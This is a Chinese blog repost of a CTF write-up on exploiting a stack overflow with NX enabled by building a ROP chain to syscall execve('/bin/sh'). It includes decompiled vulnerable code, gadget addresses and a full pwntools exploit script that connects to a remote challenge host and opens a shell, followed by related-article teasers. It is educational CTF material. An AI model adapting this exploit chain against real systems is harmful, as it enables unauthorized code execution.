栈溢出之rop到syscall

最新推荐文章于 2023-05-06 20:04:18 发布
最新推荐文章于 2023-05-06 20:04:18 发布
阅读量79 收藏
点赞数
原文链接:http://www.cnblogs.com/Joe-Z/p/5561716.html
版权

当程序开启了nx,但程序有syscall调用的时候。这时栈溢出的利用就可以通过rop来执行syscall的59号调用execve('/bin/sh',null,null),这是这次alictf一道pwn的心得。


ida配合gdb定位程序漏洞如下:

signed __int64 __fastcall sub_40108E(__int64 a1)
{
  signed __int64 result; // rax@3
  __int64 v2; // rdx@4
  int v3; // [sp+10h] [bp-40h]@1
  __int64 v4; // [sp+20h] [bp-30h]@1
  __int64 v5; // [sp+28h] [bp-28h]@1
  __int64 v6; // [sp+30h] [bp-20h]@1
  __int64 v7; // [sp+38h] [bp-18h]@1
  __int64 v8; // [sp+40h] [bp-10h]@1
  unsigned int v9; // [sp+48h] [bp-8h]@7
  int v10; // [sp+4Ch] [bp-4h]@4

  v4 = 0LL;
  v5 = 0LL;
  v6 = 0LL;
  v7 = 0LL;
  v8 = 0LL;
  v3 = 0;
  sub_400330((__int64)&v3, a1, 80LL);           // 处理输入,首字母py绕过登陆检测,80字节的最后8字节控制ret
  if ( (_BYTE)v3 != 112 || BYTE1(v3) != 121 )

通过Ropgadget找到构造syscall的rop链如下:

 
 
 
  
0x46f208 : pop rax;ret
0x401823: pop rdi;ret
0x462873: pop rcx;ret
0x422568: mov dword ptr [rdi], ecx ; ret
0x46f205 : add rsp 0x58  ret
0x43ae29: pop rdx;pop rsi;ret
0x45f2a5:  syscall;ret
 
 
 
 
 
 
利用代码:
 
 
 
  
from pwn import *
#io=process('./vss')
io=remote('114.55.103.213',2333)
praxret=0x46f208
prdiret=0x401823
prcxret=0x0000000000462873 # pop rcx  ret
movrdircx = 0x422568
addespret=0x46f205 #add rsp 0x58  ret
prdxrsiret=0x43ae29
syscallret=0x45f2a5
pay='py'+'a'*70
pay+=p64(addespret)+'a'*8                      #add rsp 0x58;ret       
pay+=p64(praxret)+p64(59)                      #pop rax;ret
pay+=p64(prcxret)+'/bin/sh\x00'+p64(movrdircx) #pop rcx;ret;mov dword ptr [rdi], ecx ; ret
pay+=p64(prdxrsiret)+p64(0)+p64(0)             #pop rdx;pop rsi;ret
pay+=p64(syscallret)                           #syscall;ret
io.recvuntil('Password:\n')
io.sendline(pay)
io.interactive()
 
 
 
 
 
 
 
 
 
 
 

 

转载于:https://www.cnblogs.com/Joe-Z/p/5561716.html

                

        

        




    




    

      

        

            

              
                
                  superXX07
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
栈溢出基础——ROP1.0的例题

				
			

			

				

					07-13
				

			

		

		

			
				
几个pwn的入门题

			
		

	



                

              
                



	

		

			

				
					
[pwn]ROP:灵活运用syscall

				
			

			

				

					Breeze的博客
				

				

					08-26
					
					9757
					
				

			

		

		

			
				
灵活运用syscall
遇到了一个程序并不复杂,但利用却很麻烦的题目,Recho题目详细writeup,题目地址:Recho
按照惯例,查看安全策略:

基本没啥安全策略,然后查看程序逻辑,程序很短,就一个main:

很容易就找到溢出点,大体逻辑就是,先输入一个数,小于15会被认为是16,然后再输入一串字符串,程序会将前x(刚输入的数字)个字符拷贝到buf中,这里没有上限,所以存在溢出。但问题是...

			
		

	



                


  
              

                


	

		

			

				
					
execve系统调用_Linux下的sys_execve系统调用

				
			

			

				

					weixin_32307599的博客
				

				

					12-31
					
					724
					
				

			

		

		

			
				
传统Int 0x80系统调用系统调用号:EAX参数:EBX、ECX、EDX、ESI、EDI、EBP返回值:EAX具体功能号在 unistd_32.h 文件中64位系统调用syscall系统调用号:RAX参数:RDI、RSI、RDX、R10、R8、R9返回值:RAX具体功能号在 unistd_64.h 文件中在pwn中一般是使用 sys_execve 系统调用来获取shell的。sys_execve...

			
		

	





	

		

			

				
					
显示recv调用次数_ctf中关于syscall系统调用的简单分析

				
			

			

				

					weixin_39820136的博客
				

				

					11-22
					
					182
					
				

			

		

		

			
				
原创 紫色仰望 合天智汇 0x01我在动态调试这个程序的时候,发现 syscall调用 系统函数 的过程很有趣,于是便记录下来 希望对大家 能带来些帮助,这里 以 buu 平台上的 ciscn_2019_s_3 为例,给大家详细地分享以及分析下!0x02在开始之前,我们先来认真 学习下 read(),write()的 原型:read():  ssize_t read(int fd,const vo...

			
		

	



		

			
		



	

		

			

				
					
【PWN】07.ret2syscall

				
			

			

				

					weixin_52553215的博客
				

				

					11-12
					
					2209
					
				

			

		

		

			
				
Linux 在x86上的系统调用通过 int 80h 实现,用系统调用号来区分入口函数。在 /usr/include/x86_64-linux-gnu/asm/unistd_64.h 和/usr/include/x86_64-linux-gnu/asm/unistd_32.h 分别可以查看 64 位和 32 位的系统调用号。

			
		

	





	

		

			

				
					
rop轻松谈.pdf

				
			

			

				

					10-21
				

			

		

		

			
				
rop基础

			
		

	





	

		

			

				
					
rop开放平台

				
			

			

				

					04-12
				

			

		

		

			
				
rop开放平台s

			
		

	





	

		

			

				
					
rop-master.rar

				
			

			

				

					11-04
				

			

		

		

			
				
RopRop 是 Rapid Open PlatformRapid Open Platform Rapid Open Platform Rapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open ...

			
		

	





	

		

			

				
					
rOpbaby-CTFPWN ROP练习题

				
			

			

				

					08-21
				

			

		

		

			
				
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP

			
		

	





	

		

			

				
					
【PWN · ret2syscall】[Wiki] ret2syscall

				
			

			

				

					Mr_Fmnwon的博客
				

				

					05-06
					
					1247
					
				

			

		

		

			
				
虽然网上(包括CSDN)有很多ret2syscall的例题,但大多是Wiki,且摘自官方题解蒟蒻想从自己的“碰南墙“的历程出发,以蒟蒻萌新的视角,述说蒟蒻萌新的新路历程~~

			
		

	





	

		

			

				
					
pwn基本ROP——ret2syscall

				
			

			

				

					turtlesd的博客
				

				

					04-25
					
					2779
					
				

			

		

		

			
				
ret2syscall环境原理系统调用利用方式漏洞分析使用`checksec`指令查看程序保护措施使用IDE32位进行调试payload
环境
ret2syscall
原理
系统调用
系统调用(英语:system call),指运行在用户空间的程序向操作系统内核请求需要更高权限运行的服务。
操作系统的进程空间可分为用户空间和内核空间,它们需要不同的执行权限。其中系统调用运行在内核空间。
应用程序调用系统调用的过程是:
1、把系统调用的编号存入 EAX;
1、把函数参数存入其它通用寄存器;
3、触发 0x80

			
		

	





	

		

			

				
					
缓冲区溢出-CTF-PWN

				
			

			

				

					04-28
				

			

		

		

			
				
<img src="https://img-bss.csdn.net/202004281305056475.jpg" alt="" />

			
		

	





	

		

			

				
					
syscall to rop

				
			

			

				

					weixin_30702887的博客
				

				

					08-03
					
					122
					
				

			

		

		

			
				
前言
hitcon 2017 的 start 题,比较简单,练练手。
题目链接:
https://gitee.com/hac425/blog_data/tree/master/hitcon2017
正文

往 rbp-0x20 读入 0xd9 的数据,溢出。
程序开了 cancary ,又后面直接 puts 把我们输入的打印出来

我们可以直接溢出到 cancary, 然后用 puts 泄露 ca...

			
		

	





	

		

			

				
					
基本ROP

				
			

			

				

					听鬼哥说故事
				

				

					08-29
					
					8591
					
				

			

		

		

			
				
随着NX保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是ROP(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上(这一条之后不再重复提及),通过利用程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而改变程序的执行流程。**所谓gadgets就是以ret结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。

			
		

	





	

		

			

				
					
基本ROP技巧总结

				
			

			

				

					极目楚天舒的博客
				

				

					05-06
					
					5606
					
				

			

		

		

			
				
ROP攻击前提:存在栈溢出并且可以控制返回地址存在满足条件的gadget,如果开启了PIE保护则要想办法泄露gadget的地址ret2text程序本身存在类似于system('/bin/sh')或者execv('/bin/sh')的片段,我们可以直接将返回地址覆盖为其地址跳转到已有代码上。例子:TODOret2shellcode这种方法要求我们自己构造shellcode并控制程序跳转到我们构造的s...

			
		

	





	

		

			

				
					
基本ROP(三)

				
			

			

				

					Pwnpanda的博客
				

				

					05-08
					
					1843
					
				

			

		

		

			
				
每日一结【第3天】

由于个人水平有限,所以相当一部分是引用CTF Wiki(再次安利一波)

ret2syscall

原理: 
ret2syscall需要我们控制程序执行系统调用,获取shell。

样例:rop

前期基本的操作之前两篇已经讲了,这里就直接上图了 




我们这次把程序扔到IDA里㕛有新的发现了 
 


此次我们利用程序中的gadgets来获得shell,而对应的shel...

			
		

	





	

		

			

				
					
基本ROP之ret2syscall

				
			

			

				

					至臻求学,胸怀云月
				

				

					01-13
					
					733
					
				

			

		

		

			
				
原理
控制程序执行系统调用
过程
下载链接
查看程序保护
checksec rop

IDA查找危险函数

计算偏移

老方法计算偏移(gdb设置断点)
上篇博客有,可以自行查找
计算偏移为6C,十进制是108,加4之后是112

利用系统调用
简单地说,只要我们把对应获取 shell 的系统调用的参数放到对应的寄存器中,那么我们在执行 int 0x80 就可执行对应的系统调用。比如说这里我们利用...

			
		

	





	

		

			

				
					
高级ROP

				
			

			

				

					听鬼哥说故事
				

				

					08-29
					
					4884
					
				

			

		

		

			
				
高级ROP其实和一般的ROP基本一样,其主要的区别在于它利用了一些比较有意思的gadgets。

			
		

	





	

		

			

				
					
vs2022-栈溢出

					
最新发布

				
			

			

				

					10-30
				

			

		

		

			
				
栈溢出是一种常见的安全漏洞,它通常发生在程序试图向栈中写入超过其分配的内存空间的数据时。攻击者可以利用这种漏洞来覆盖返回地址,从而控制程序的执行流程。在VS2022中,可以通过以下几个步骤来防止栈溢出漏洞的...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值